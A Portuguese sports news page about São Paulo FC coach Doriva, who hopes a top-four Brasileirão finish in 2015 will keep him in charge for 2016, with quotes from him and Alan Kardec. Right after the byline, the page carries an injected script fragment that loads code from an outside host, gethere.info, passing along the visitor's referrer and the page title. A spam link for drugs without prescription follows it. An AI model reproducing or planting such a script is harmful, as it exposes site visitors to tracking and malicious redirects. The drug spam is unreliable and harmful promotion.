Destaque Noticia

Doriva se apega a G4 para provar que pode ficar em 2016

Além da importância para a tabela e o planejamento tricolor visando à temporada 2016, um triunfo diante do Sport, neste sábado, às 17h, no Morumbi, aliviaria a situação do técnico Doriva. Pressionado pelas saídas de Carlos Miguel Aidar e José Eduardo Chimello, nomes que o contrataram, o treinador vê na chance de levar o clube à competição talvez o único feito que assegure seu cargo no ano que vem.

“Por enquanto, me sinto totalmente prestigiado aqui dentro do clube. Estou à frente do projeto, focado e buscando os objetivos estabelecidos por nós. Vocês vão ver”, apostou o treinador, que já eve conversas com o novo presidente, Carlos Augusto de Barros e Silva, e o velho/novo gerente de futebol, Gustavo Vieira.

Ambos, por sinal, comentaram na imprensa que o cargo não está a perigo. Enquanto Leco considera Doriva um dos acertos da gestão Aidar, Gustavo fez questão de ir ao CCT da Barra Funda na quinta-feira, logo após a eliminação para o Santos. Lá, conversou por cerca de meia hora com o comandante são-paulino e deixou sorridente o campo onde os atletas treinavam.

“Todos os atletas, sem exceção, gostam do trabalho dele, da forma de lidar. Se for uma decisão da diretoria mantê-lo, será uma decisão acertada. Ainda mais no final do ano, pois estamos lutando pelo G4, que não era nosso objetivo inicial, mas acabou virando pelas circunstâncias”, comentou Alan Kardec, dando a visão do elenco sobre o caso.

Mesmo com o discurso, porém, alguns aspectos da reta final dão a entender que o clube já pensa em outro nome para ser seu técnico. Durante os últimos dias, por exemplo, a diretoria começou a conversar sobre possiveis contratações para o ano que vem. Nenhum dos papos, no entanto, contou com a presença de Doriva.

“Ainda não conversamos sobre planejamento, não sentamos para planjear 2016 até porque a gente tem visado ao ano de 2016 praticamente atrelado a buscar essa classificação à Libertadores”, revelou o treinador, confiante na sua continuidade em caso de vaga entre os quatro primeiros do Brasileiro.

Com 50 pontos conquistados, a equipe certamente dormirá no grupo dos líderes caso derrote o Leão, concorrente direto na vaga, com 49. No domingo, assistiria de camarote ao clássico entre outros dois times que almejam a vaga: Santos e Palmeiras, às 17h, na Vila Belmiro.

Gazeta Esportiva.nets.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; buy inexpensively drugs without prescription – http://azispurba.mhs.narotama.ac.id/2016/11/30/buy-inexpensively-drugs-without-prescription/ pills

Clique para adicionar um comentário

Leave a Reply

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

dezessete + dezenove =

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.

Destaque Noticia

Mais em Destaque Noticia

Quando foi a última vez que o São Paulo fez 5 gols em um jogo?

saopauloadmin21 de outubro de 2020

Sul-Americana, Copa do Brasil ou Brasileirão: qual torneio se dedicar?

saopauloadmin20 de outubro de 2020

São Paulo vive a sua maior sequência sem derrotas na temporada mas só venceu 2 dos últimos 11 jogos

saopauloadmin19 de outubro de 2020

São Paulo: Diniz afirma que arbitragem contra Fortaleza foi ‘confusa’

saopauloadmin15 de outubro de 2020

Veja o que mudou no SPFC desde o adeus na Libertadores

saopauloadmin13 de outubro de 2020

Fernando Diniz supera pressão e segue com duas pedras no caminho: Palmeiras e Rogério Ceni

saopauloadmin8 de outubro de 2020

Juanfran sente joelho na primeira etapa e vira preocupação para o São Paulo

saopauloadmin8 de outubro de 2020

Fernando Diniz lida com dúvida na lateral direita

saopauloadmin4 de outubro de 2020

Após eliminação na Libertadores, Raí banca Diniz no São Paulo

saopauloadmin1 de outubro de 2020